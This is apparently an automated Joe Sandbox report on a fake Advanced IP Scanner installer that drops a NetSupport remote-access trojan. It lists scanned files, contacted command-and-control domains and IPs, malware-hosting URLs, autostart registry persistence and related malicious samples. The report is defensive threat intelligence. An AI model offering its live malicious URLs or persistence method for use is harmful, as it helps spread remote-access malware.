C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-process-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-runtime-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-stdio-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-string-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-time-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-utility-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-087J4.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-2CC7N.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-37BEP.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-3ARML.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-3DFK3.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-4D790.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-4DCVH.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-4PSUK.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-50T4N.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-51B0J.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-6GDPR.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-7T7KO.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-7UOKJ.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-8ANUI.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-8I66A.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-8NFDN.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-94LO6.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-9QSUE.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-B6942.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-BI69I.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-CFBB0.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-E5GMR.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-FDUCH.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-FM5PR.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-G1AVJ.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-G1QBE.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-GO656.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-GSEGB.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-GUGRV.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-HE8PV.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-HU2BS.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-IG6SE.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-IMIK4.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-JD615.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-JMNJE.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-JMQQ6.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-JV2VP.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-KVJOO.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-LK5P7.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-MLS3P.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-MRJ39.tmp	3%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-NAJMA.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-NDG98.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-NMSBJ.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-OFA57.tmp	0%	ReversingLabs

Source	Detection	Scanner	Label
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
http://crl.thawte.com/ThawteTimestampingCA.crl0	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
https://www.remobjects.com/ps	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://www.innosetup.com/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://www.symauth.com/cps0(	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	0%	URL Reputation	safe
http://www.symauth.com/rpa00	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
payiki.com	151.236.16.15	true	true	unknown
geo.netsupportsoftware.com	104.26.1.231	true	false	unknown
anyhowdo.com	199.188.200.195	true	true	unknown

Contacted URLs

Name	Malicious	Reputation
http://151.236.16.15/fakeurl.htm	true	unknown
http://geo.netsupportsoftware.com/location/loca.asp	false	unknown
http://199.188.200.195/fakeurl.htm	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.netsupportsoftware.com	powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	Advanced_IP_Scanner_2.5.4594.12.exe	false		unknown
http://%s/testpage.htmwininet.dll	powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp	false		unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr	false	URL Reputation: safe	unknown
http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)	client32.exe, 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	false		unknown
http://ocsp.sectigo.com0	powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr	false	URL Reputation: safe	unknown
http://www.pci.co.uk/supportsupport	client32.exe, 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2161014488.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249175114.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	false		unknown
https://contoso.com/License	powershell.exe, 00000005.00000002.2146961132.0000000006426000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://127.0.0.1RESUMEPRINTING	client32.exe, 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	false		unknown
http://%s/testpage.htm	powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp	false		unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ultimatenetworktool.com/update	Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.2257970468.0000000002DF3000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2249168820.0000000002DFA000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://%s/fakeurl.htm	client32.exe, client32.exe, 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp	false		unknown
http://geo.netsupportsoftware.com/location/loca.asp$k	client32.exe, 00000007.00000003.2067260818.00000000004E9000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://geo.netsupportsoftware.com/location/loca.asp5X	client32.exe, 00000007.00000002.3638542031.000000000049A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000005.00000002.2134480626.00000000049C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ultimatenetworktool.com	Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.2257970468.0000000002DE4000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://www.remobjects.com/ps	Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1793005719.000000007EB0B000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1792633341.00000000033D0000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000000.1794346897.0000000000501000.00000020.00000001.01000000.00000004.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp.0.dr	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000005.00000002.2146961132.0000000006426000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000005.00000002.2146961132.0000000006426000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.innosetup.com/	Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1793005719.000000007EB0B000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1792633341.00000000033D0000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000000.1794346897.0000000000501000.00000020.00000001.01000000.00000004.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp.0.dr	false	URL Reputation: safe	unknown
https://sectigo.com/CPS0D	powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr	false		unknown
http://www.macrovision.com0	Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://www.netsupportschool.com/tutor-assistant.asp11(	client32.exe, 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2161014488.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249175114.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	false		unknown
http://geo.netsupportsoftware.com/location/loca.aspj	client32.exe, 00000007.00000002.3639491690.00000000030EA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000005.00000002.2134480626.00000000049C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.netsupportschool.com/tutor-assistant.asp	client32.exe, 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2161014488.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249175114.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	false		unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000005.00000002.2146961132.0000000006426000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.pci.co.uk/support	client32.exe, 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2161014488.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249175114.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	false		unknown
https://sectigo.com/CPS0	powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://ocsp.thawte.com0	Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000005.00000002.2146961132.0000000006426000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr	false	URL Reputation: safe	unknown
http://www.radmin.com	Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://127.0.0.1	client32.exe, client32.exe, 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	false		unknown
http://www.symauth.com/cps0(	Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr	false	URL Reputation: safe	unknown
http://www.advanced-ip-scanner.com0	Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2253546565.0000000000D9C000.00000004.00000010.00020000.00000000.sdmp, is-R93D4.tmp.1.dr	false		unknown
http://www.ultimatenetworktool.com1	Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2249168820.0000000002DEC000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr	false	URL Reputation: safe	unknown
http://www.symauth.com/rpa00	Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr	false	URL Reputation: safe	unknown
http://www.ultimatenetworktool.com/support	Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.2257970468.0000000002DF3000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2249168820.0000000002DFA000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://geo.netsupportsoftware.com/location/loca.asp2	client32.exe, 00000007.00000002.3639491690.00000000030EA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.microx	powershell.exe, 00000005.00000002.2176938305.0000000007540000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.26.1.231	geo.netsupportsoftware.com	United States	13335	CLOUDFLARENETUS	false
151.236.16.15	payiki.com	European Union	29802	HVC-ASUS	true
199.188.200.195	anyhowdo.com	United States	22612	NAMECHEAP-NETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1546304
Start date and time:	2024-10-31 18:59:42 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Advanced_IP_Scanner_2.5.4594.12.exe
Detection:	MAL
Classification:	mal56.rans.spre.troj.evad.winEXE@10/300@3/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 70% Number of executed functions: 176 Number of non-executed functions: 235
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 7132 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: Advanced_IP_Scanner_2.5.4594.12.exe

Simulations

Behavior and APIs

Time	Type	Description
14:01:43	API Interceptor	9357375x Sleep call for process: client32.exe modified
18:00:36	Task Scheduler	Run new task: {76D64EFA-7A92-4BFE-9669-22CE49CB6146} path: .
18:01:13	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MyApp C:\Users\user\AppData\Roaming\SysHelper\client32.exe
18:01:21	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MyApp C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.1.231	file.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	NeftPaymentError_Emdtd22102024_jpg.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	NeftPaymentError_Emdtd22102024_jpg.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	Update.js	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	update.js	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	upd_8707558.msix	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	Update.js	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	FakturaPDF.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
151.236.16.15	https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	http://151.236.16.15/fakeurl.htm
199.188.200.195	https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	http://199.188.200.195/fakeurl.htm

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
payiki.com	https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	151.236.16.15
geo.netsupportsoftware.com	https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	172.67.68.212
	file.exe	Get hash	malicious	NetSupport RAT	Browse	172.67.68.212
	file.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231
	https://webdemo.biz/	Get hash	malicious	NetSupport RAT, CAPTCHA Scam	Browse	104.26.0.231
	https://inspyrehomedesign.com	Get hash	malicious	NetSupport RAT	Browse	172.67.68.212
	https://inspyrehomedesign.com/Ray-verify.html	Get hash	malicious	NetSupport RAT	Browse	172.67.68.212
	file.exe	Get hash	malicious	NetSupport RAT	Browse	172.67.68.212
	file.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231
	http://holidaybunch.com	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231
anyhowdo.com	https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	199.188.200.195

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NAMECHEAP-NETUS	https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	199.188.200.195
	https://saniest.com/PO/PO%20-%20OCT.'24673937.rar	Get hash	malicious	Unknown	Browse	162.0.232.202
	#U2749Factura_#U2749_#U2462#U2465#U2460#U2463#U2463#U2460#U2462#U2461.hta	Get hash	malicious	Unknown	Browse	68.65.122.45
	#U2749Factura_#U2749_#U2466#U2461#U2466#U2462#U2467#U2465#U2465#U2465.hta	Get hash	malicious	Unknown	Browse	68.65.122.45
	672365339196e.vbs	Get hash	malicious	Unknown	Browse	68.65.122.45
	18in SPA-198-2024.exe	Get hash	malicious	FormBook	Browse	162.0.231.203
	WARUNKI UMOWY-pdf.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse	162.0.231.203
	HSBC Payment Advice.exe	Get hash	malicious	FormBook	Browse	63.250.47.57
	Purchase_Order_pdf.exe	Get hash	malicious	FormBook	Browse	162.0.238.246
HVC-ASUS	https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	151.236.16.15
	PO-33463334788.exe	Get hash	malicious	Remcos, GuLoader	Browse	23.227.202.197
	IGNM2810202400017701_270620240801_546001.vbs	Get hash	malicious	GuLoader	Browse	66.206.22.19
	https://www-suasconsult-com-br.translate.goog/?_x_tr_sl=pt&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=sc	Get hash	malicious	Unknown	Browse	69.46.1.10
	nklarm7.elf	Get hash	malicious	Unknown	Browse	23.227.187.69
	splmips.elf	Get hash	malicious	Unknown	Browse	172.110.9.223
	jklppc.elf	Get hash	malicious	Unknown	Browse	149.255.39.213
	kkkmips.elf	Get hash	malicious	Unknown	Browse	104.156.53.55
	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	66.96.86.101
CLOUDFLARENETUS	original.eml	Get hash	malicious	Mamba2FA	Browse	188.114.96.3
	https://fcs-aero.com/ilsmart/marketplace/inventory/#ksunya.chan@yogiproducts.com	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	z17Mz7zumpwTUMRxyS.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.33.140
	file.exe	Get hash	malicious	LummaC	Browse	104.21.33.140
	https://s3.timeweb.cloud/d2247a8d-ceb09c71-57ee-4411-a590-e4de8ca5cf86/Contract/contract.htm#andrew.wise@arrowbank.com	Get hash	malicious	HTMLPhisher	Browse	104.17.201.1
	https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	172.67.68.212
	https://0nmdby.data--8.co.uk/oGRApYgs	Get hash	malicious	Unknown	Browse	172.67.212.158
